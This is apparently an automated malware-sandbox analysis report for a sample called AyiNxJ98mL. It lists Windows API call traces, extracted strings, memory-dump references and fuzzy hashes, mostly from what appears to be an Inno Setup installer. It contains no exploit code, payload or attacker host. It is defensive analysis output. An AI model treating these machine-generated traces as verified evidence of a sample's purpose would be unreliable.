                                                              • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                              • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                              • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                              • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                              • String ID:
                                                              • API String ID: 1694776339-0
                                                              • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                              • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                              • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                              • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                              APIs
                                                              • GetSystemMenu.USER32(00000000,00000000), ref: 00422243
                                                              • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422261
                                                              • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226E
                                                              • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042227B
                                                              • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422288
                                                              • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422295
                                                              • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 004222A2
                                                              • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 004222AF
                                                              • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222CD
                                                              • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222E9
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Menu$Delete$EnableItem$System
                                                              • String ID:
                                                              • API String ID: 3985193851-0
                                                              • Opcode ID: 510ebc35eb44907ae1e975f945bfd8864758d272309f2385250dfef8029dc5ab
                                                              • Instruction ID: b791af981bedf3385b2dd143af085cc0c004e448fbd85fce69a0ff0a91ac5271
                                                              • Opcode Fuzzy Hash: 510ebc35eb44907ae1e975f945bfd8864758d272309f2385250dfef8029dc5ab
                                                              • Instruction Fuzzy Hash: 35213370340744BAE720D725DD8BF9B7BD89B04718F4440A5BA487F2D7C7F9AA80869C
                                                              APIs
                                                              • FreeLibrary.KERNEL32(10000000), ref: 00481499
                                                              • FreeLibrary.KERNEL32(030E0000), ref: 004814AD
                                                              • SendNotifyMessageA.USER32(00020424,00000496,00002710,00000000), ref: 0048151F
                                                              Strings
                                                              • GetCustomSetupExitCode, xrefs: 00481339
                                                              • Not restarting Windows because Setup is being run from the debugger., xrefs: 004814CE
                                                              • DeinitializeSetup, xrefs: 00481395
                                                              • Deinitializing Setup., xrefs: 004812FA
                                                              • Restarting Windows., xrefs: 004814FA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary$MessageNotifySend
                                                              • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                              • API String ID: 3817813901-1884538726
                                                              • Opcode ID: cfffdee43b38d7813a81b11c3b84a740b2c32b2c8dbaa0def3367d9992a49e61
                                                              • Instruction ID: fb8259b883485ef9100c7f5c1e95e74d54582b152ce66d5af1bc00326fba4159
                                                              • Opcode Fuzzy Hash: cfffdee43b38d7813a81b11c3b84a740b2c32b2c8dbaa0def3367d9992a49e61
                                                              • Instruction Fuzzy Hash: 4451A034704240AFD711EB69D895B2E7BE9FB59704F50887BE801C72B1DB38A846CB5D
                                                              APIs
                                                              • SHGetMalloc.SHELL32(?), ref: 00461A33
                                                              • GetActiveWindow.USER32 ref: 00461A97
                                                              • CoInitialize.OLE32(00000000), ref: 00461AAB
                                                              • SHBrowseForFolder.SHELL32(?), ref: 00461AC2
                                                              • CoUninitialize.OLE32(00461B03,00000000,?,?,?,?,?,00000000,00461B87), ref: 00461AD7
                                                              • SetActiveWindow.USER32(?,00461B03,00000000,?,?,?,?,?,00000000,00461B87), ref: 00461AED
                                                              • SetActiveWindow.USER32(?,?,00461B03,00000000,?,?,?,?,?,00000000,00461B87), ref: 00461AF6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                              • String ID: A
                                                              • API String ID: 2684663990-3554254475
                                                              • Opcode ID: 6bf2c69099c90f86a267e24c634b690acb1506b8ce1301c413aa044d63ad6a36
                                                              • Instruction ID: 1302daae15839a874164301860301a8b98b45f7dd6f96d3c0913b4bd506695dd
                                                              • Opcode Fuzzy Hash: 6bf2c69099c90f86a267e24c634b690acb1506b8ce1301c413aa044d63ad6a36
                                                              • Instruction Fuzzy Hash: 64314FB0E00248AFDB00EFE6D885A9EBBF8EB09304F51447AF404E7251E7785A44CF59
                                                              APIs
                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,00472D29,?,?,?,00000008,00000000,00000000,00000000,?,00472F85,?,?,00000000,004731F4), ref: 00472C8C
                                                                • Part of subcall function 0042CDA4: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE1A
                                                                • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049B628,004980C1,00000000,00498116,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                              • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472D29,?,?,?,00000008,00000000,00000000,00000000,?,00472F85), ref: 00472D03
                                                              • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472D29,?,?,?,00000008,00000000,00000000,00000000), ref: 00472D09
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                              • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                              • API String ID: 884541143-1710247218
                                                              • Opcode ID: e52ff7fc8aad4532f2121d8bd5e8e7392c558ff45c5d59df65582d72ab666be0
                                                              • Instruction ID: a2498b92200520dbea2b626460b71344a260e4c3afc9e0684e621ff8b49742b9
                                                              • Opcode Fuzzy Hash: e52ff7fc8aad4532f2121d8bd5e8e7392c558ff45c5d59df65582d72ab666be0
                                                              • Instruction Fuzzy Hash: 731122303005087BD721EA66DD82B9E73ACCB88714F60853BB404B72D1CB7CEE02865C
                                                              APIs
                                                              • GetProcAddress.KERNEL32(030E0000,inflateInit_), ref: 0045D621
                                                              • GetProcAddress.KERNEL32(030E0000,inflate), ref: 0045D631
                                                              • GetProcAddress.KERNEL32(030E0000,inflateEnd), ref: 0045D641
                                                              • GetProcAddress.KERNEL32(030E0000,inflateReset), ref: 0045D651
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                              • API String ID: 190572456-3516654456
                                                              • Opcode ID: fd665f86a4c397101f291ae51b8d6e2550680f8309e6d6ef8ebab45c29bb7339
                                                              • Instruction ID: 6d5035e3426567f523c7c0f539c0fc89aa7e9857b83a97dd2a4ec5b9764e3533
                                                              • Opcode Fuzzy Hash: fd665f86a4c397101f291ae51b8d6e2550680f8309e6d6ef8ebab45c29bb7339
                                                              • Instruction Fuzzy Hash: 0D01ECB0900740DEEB24DFB6ACC572236A5ABA470AF14C13B980DD62A2D779044ADF2C
                                                              APIs
                                                              • SetBkColor.GDI32(?,00000000), ref: 0041A9C9
                                                              • 73A24D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041AA03
                                                              • SetBkColor.GDI32(?,?), ref: 0041AA18
                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA62
                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0041AA6D
                                                              • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA7D
                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AABC
                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0041AAC6
                                                              • SetBkColor.GDI32(00000000,?), ref: 0041AAD3
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Color$StretchText
                                                              • String ID:
                                                              • API String ID: 2984075790-0
                                                              • Opcode ID: 318b750f44eee03e3b20258c50c4ae641761c2031fb7fe23ccccef054dc028d8
                                                              • Instruction ID: 0e7efefeb240adcf91359f1fba61dc18d1efd34d50a4dd97ee32c9a960060edb
                                                              • Opcode Fuzzy Hash: 318b750f44eee03e3b20258c50c4ae641761c2031fb7fe23ccccef054dc028d8
                                                              • Instruction Fuzzy Hash: 9861C5B5A00105EFCB40EFADD985E9AB7F8AF08314B10856AF918DB261C735ED41CF68
                                                              APIs
                                                                • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                              • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,004580B4,?, /s ",?,regsvr32.exe",?,004580B4), ref: 00458026
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CloseDirectoryHandleSystem
                                                              • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                              • API String ID: 2051275411-1862435767
                                                              • Opcode ID: 55f146e1ef8f4e902545c9b8fd40e77843967da88cee367bff3e11b3e7507cae
                                                              • Instruction ID: 809e342f07c36c5fe80e3456e65159aecd70c9e1b429d99a18f855550af0e9f5
                                                              • Opcode Fuzzy Hash: 55f146e1ef8f4e902545c9b8fd40e77843967da88cee367bff3e11b3e7507cae
                                                              • Instruction Fuzzy Hash: 97411570A043086BDB10EFD5D842B8EF7B9AB49705F51407FA904BB292DF789A0D8B19
                                                              APIs
                                                              • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1B9
                                                              • GetSysColor.USER32(00000014), ref: 0044D1C0
                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0044D1D8
                                                              • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D201
                                                              • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D20B
                                                              • GetSysColor.USER32(00000010), ref: 0044D212
                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0044D22A
                                                              • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D253
                                                              • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D27E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Text$Color$Draw$OffsetRect
                                                              • String ID:
                                                              • API String ID: 1005981011-0
                                                              • Opcode ID: 0dad7e536888b1c395f42d34690ba7b0fa2f949a96348ff67bbd6a991a2663e5
                                                              • Instruction ID: 3cb6cff9cb4fe1f97db5fca9cf7ecf77bacdc285bba155e9e6a5fbb2dce94e66
                                                              • Opcode Fuzzy Hash: 0dad7e536888b1c395f42d34690ba7b0fa2f949a96348ff67bbd6a991a2663e5
                                                              • Instruction Fuzzy Hash: 4921CFB42015007FC710FB6ACD8AE8B7BDCDF19319B01857AB918EB393C678DD408669
                                                              APIs
                                                              • GetFocus.USER32 ref: 0041B755
                                                              • 73A1A570.USER32(?), ref: 0041B761
                                                              • 73A18830.GDI32(00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B796
                                                              • 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B7A2
                                                              • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B7D0
                                                              • 73A18830.GDI32(00000000,00000000,00000000,0041B811,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B804
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: A18830$A122A26310A570Focus
                                                              • String ID: k H
                                                              • API String ID: 3906783838-1447039187
                                                              • Opcode ID: 4650e7e3a4975632b128e642f4d75ab8ab1f3030e92489ac81d42ae66184f42b
                                                              • Instruction ID: e4fa2330707e2e3496a7563b6e1a8945dd65194040c1b513b55e56702052f46b
                                                              • Opcode Fuzzy Hash: 4650e7e3a4975632b128e642f4d75ab8ab1f3030e92489ac81d42ae66184f42b
                                                              • Instruction Fuzzy Hash: 33512D74A00208AFCB11DFA9C855AEEBBF9FF49704F104466F504A7390D7789981CBA9
                                                              APIs
                                                              • GetFocus.USER32 ref: 0041BA27
                                                              • 73A1A570.USER32(?), ref: 0041BA33
                                                              • 73A18830.GDI32(00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA6D
                                                              • 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA79
                                                              • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BA9D
                                                              • 73A18830.GDI32(00000000,00000000,00000000,0041BADE,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BAD1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: A18830$A122A26310A570Focus
                                                              • String ID: k H
                                                              • API String ID: 3906783838-1447039187
                                                              • Opcode ID: 69b514878c6882b8832b1f329327574619d6a3e89a85ba6a4f0b9ad1becc3db2
                                                              • Instruction ID: 8a06375b061ea5bfc02952791cdae78cf5b61e443f36c9dad2d84499db0416b2
                                                              • Opcode Fuzzy Hash: 69b514878c6882b8832b1f329327574619d6a3e89a85ba6a4f0b9ad1becc3db2
                                                              • Instruction Fuzzy Hash: FE510975A002189FCB11DFA9C891AAEBBF9FF49700F15806AF504EB751D7789D40CBA4
                                                              APIs
                                                                • Part of subcall function 00450918: SetEndOfFile.KERNEL32(?,?,0045C6A6,00000000,0045C831,?,00000000,00000002,00000002), ref: 0045091F
                                                                • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049B628,004980C1,00000000,00498116,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 00495F55
                                                              • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00495F69
                                                              • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00495F83
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495F8F
                                                              • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495F95
                                                              • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495FA8
                                                              Strings
                                                              • Deleting Uninstall data files., xrefs: 00495ECB
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                              • String ID: Deleting Uninstall data files.
                                                              • API String ID: 1570157960-2568741658
                                                              • Opcode ID: 23da1316c50969bb810f13416529c5ad46a4d90d4c3b6db3608d618ecf590902
                                                              • Instruction ID: fec72cc46ef3efd5c3c8e8a450f489c3c08d507a48e2b84f6ee45df75d5b7e94
                                                              • Opcode Fuzzy Hash: 23da1316c50969bb810f13416529c5ad46a4d90d4c3b6db3608d618ecf590902
                                                              • Instruction Fuzzy Hash: 34219571304610AFEB11EB75ECC2B2637A8EB54338F61053BF504DA1E6D678AC008B1D
                                                              APIs
                                                                • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                              • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004705A1,?,?,?,?,00000000), ref: 0047050B
                                                              • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004705A1), ref: 00470522
                                                              • AddFontResourceA.GDI32(00000000), ref: 0047053F
                                                              • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00470553
                                                              Strings
                                                              • Failed to open Fonts registry key., xrefs: 00470529
                                                              • AddFontResource, xrefs: 0047055D
                                                              • Failed to set value in Fonts registry key., xrefs: 00470514
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                              • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                              • API String ID: 955540645-649663873
                                                              • Opcode ID: 2b4b64eddd1924655c58b9871aff7fb9a4f934a6e6bff31d8454543361526e14
                                                              • Instruction ID: 66ce3b01f7eb708e2302e7809b1ea03697ff66c32de1c99646f3643d23023453
                                                              • Opcode Fuzzy Hash: 2b4b64eddd1924655c58b9871aff7fb9a4f934a6e6bff31d8454543361526e14
                                                              • Instruction Fuzzy Hash: 62216570741204BBDB10EA669C42FAE779D9B55708F50843BB904EB3C2D67CDE028A5D
                                                              APIs
                                                                • Part of subcall function 00416420: GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                • Part of subcall function 00416420: UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                • Part of subcall function 00416420: RegisterClassA.USER32(?), ref: 004164DE
                                                              • GetVersion.KERNEL32 ref: 004631CC
                                                              • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 0046320A
                                                              • SHGetFileInfo.SHELL32(004632A8,00000000,?,00000160,00004011), ref: 00463227
                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 00463245
                                                              • SetCursor.USER32(00000000,00000000,00007F02,004632A8,00000000,?,00000160,00004011), ref: 0046324B
                                                              • SetCursor.USER32(?,0046328B,00007F02,004632A8,00000000,?,00000160,00004011), ref: 0046327E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
